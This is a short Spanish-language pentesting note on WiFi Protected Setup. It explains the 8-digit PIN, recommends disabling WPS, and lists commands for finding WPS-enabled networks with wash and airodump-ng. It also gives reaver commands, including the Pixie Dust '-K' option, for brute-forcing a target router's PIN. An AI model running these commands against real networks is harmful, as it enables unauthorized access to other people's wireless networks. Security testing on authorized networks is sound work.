WPS

Wifi Protected Setup

Es una funcionalidad básica que permite la conexión a una red WiFi escribiendo un PIN de 8 dígitos en lugar de una contraseña más compleja.

Es aconsejable tener deshabilitado el WPS en las redes :)

Obtener PIN

Para conocer si las redes hacen uso de WPS, tenemos 2 opciones:

wash -i [wlan0mon]

airodump-ng -band abg [wlan0mon] --wps

Si tenemos una red con WPS versión 1.0, cogeremos su MAC (BSSID) y podremos ejecutar un ataque de fuerza bruta con Reaver

reaver -b [BSSID] -i [wlan0mon] -v
reaver -b [BSSID] -i [wlan0mon] -v -K

-K sirve para que sea más rápido el ataque realizando un PixieWPD attack

Last updated 6 months ago